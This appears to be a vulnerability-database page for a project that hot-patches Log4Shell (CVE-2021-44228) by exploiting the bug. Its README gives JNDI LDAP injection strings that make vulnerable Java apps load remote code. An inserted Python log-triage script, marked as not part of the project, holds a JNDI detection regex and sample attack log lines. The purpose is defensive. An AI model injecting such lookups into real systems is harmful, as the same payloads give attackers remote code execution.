Related vulnerabilities
Description
Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.
Introduction
# cve-2021-44228-qingteng-online-patch
## What is this
Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.
## How to use
Inject the following code anywhere likely to be vulnerable to CVE-2021-44228:
```
${jndi:ldap://your-own-server/patch}
```
To prevent a MITM attack during the patch process, the following payload is recommended, although it is less compatible with older versions of Java:
```
${jndi:ldap://your-own-server/any_string_except_patch}
```
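For the monitoring side of this procedure, the following log triage separates lookups that point at your own patch server from all others, so authorised hot-patch injections are not mistaken for hostile ones. It is an added example, not part of the project; `PATCH_SERVERS`, the verdict names and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: hostname(s) of the hot-patch LDAP server your own team operates.
PATCH_SERVERS = {"patch.internal.example"}

# Matches only the literal lookup form shown in the README; obfuscated
# variants need their own detection rule.
JNDI_RE = re.compile(r"\$\{jndi:(ldaps?://[^}\s]+)\}", re.IGNORECASE)

def classify(line, allowed=PATCH_SERVERS):
    """Return (verdict, host, path) for every JNDI LDAP lookup in one log line."""
    hits = []
    for match in JNDI_RE.finditer(line):
        try:
            url = urlsplit(match.group(1))
            host = (url.hostname or "").lower()
        except ValueError:               # e.g. unbalanced IPv6 brackets
            hits.append(("malformed", "", ""))
            continue
        path = url.path.lstrip("/")
        if host not in allowed:
            verdict = "foreign"          # not our server: handle as an attack attempt
        elif path == "patch":
            verdict = "own-patch"        # the /patch payload
        elif path:
            verdict = "own-mitm-safe"    # the any_string_except_patch payload
        else:
            verdict = "malformed"
        hits.append((verdict, host, path))
    return hits

def triage(lines, allowed=PATCH_SERVERS):
    """Map each verdict to the 1-based line numbers where it occurred."""
    report = {}
    for number, line in enumerate(lines, start=1):
        for verdict, _host, _path in classify(line, allowed):
            report.setdefault(verdict, []).append(number)
    return report

# Constructed reverse-proxy access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 "GET / HTTP/1.1" 200 "${jndi:ldap://patch.internal.example:1389/patch}"',
    '10.0.0.5 "GET / HTTP/1.1" 200 "${jndi:ldap://patch.internal.example/a1b2c3}"',
    '198.51.100.7 "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/x}"',
    '10.0.0.9 "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```

A matching host shows only where the lookup points; confirm authorised runs against the source address and change window of your patch operation.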
## Run your own server
1. Download the latest [releases](https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch/releases)
2. Set the system environment variables `LOG4J_HOTFIX_HTTP_PATH` and `LOG4J_HOTFIX_HTTPS_PATH` if you want to host Hotfix.class on your own server
## Build
Please note Hotfix.java should be compiled with JDK6 for maximum compatibility.
File snapshot
```
[4.0K] /data/pocs/daf3e42394a1873fe0c28e0321b3a9602265560d
├── [ 333] build.gradle
├── [4.0K] gradle
│   └── [4.0K] wrapper
│       ├── [ 58K] gradle-wrapper.jar
│       └── [ 200] gradle-wrapper.properties
├── [5.6K] gradlew
├── [2.6K] gradlew.bat
├── [ 11K] LICENSE
├── [ 850] README.md
├── [  35] settings.gradle
└── [4.0K] src
    └── [4.0K] main
        └── [4.0K] java
            ├── [ 15K] HotfixGenerator.java
            ├── [3.3K] Hotfix.java
            └── [3.8K] LDAPServer.java

5 directories, 11 files
```